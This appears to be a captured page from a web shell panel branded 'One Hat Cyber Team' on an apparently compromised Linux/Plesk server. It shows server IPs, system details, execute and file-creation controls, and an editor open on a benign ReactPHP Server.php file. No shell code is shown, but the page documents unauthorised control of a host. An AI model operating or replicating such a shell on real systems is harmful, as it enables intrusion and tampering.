⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.19
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
local
/
psa
/
admin
/
plib
/
vendor
/
react
/
http
/
src
/
Edit File: Server.php
<?php namespace React\Http; // Deprecated `Server` is an alias for new `HttpServer` to ensure existing code continues to work as-is. \class_alias(__NAMESPACE__ . '\\HttpServer', __NAMESPACE__ . '\\Server', true); // Aid static analysis and IDE autocompletion about this deprecation, // but don't actually execute during runtime because `HttpServer` is final. if (!\class_exists(__NAMESPACE__ . '\\Server', false)) { /** * @deprecated 1.5.0 See HttpServer instead * @see HttpServer */ final class Server extends HttpServer { } }
Simpan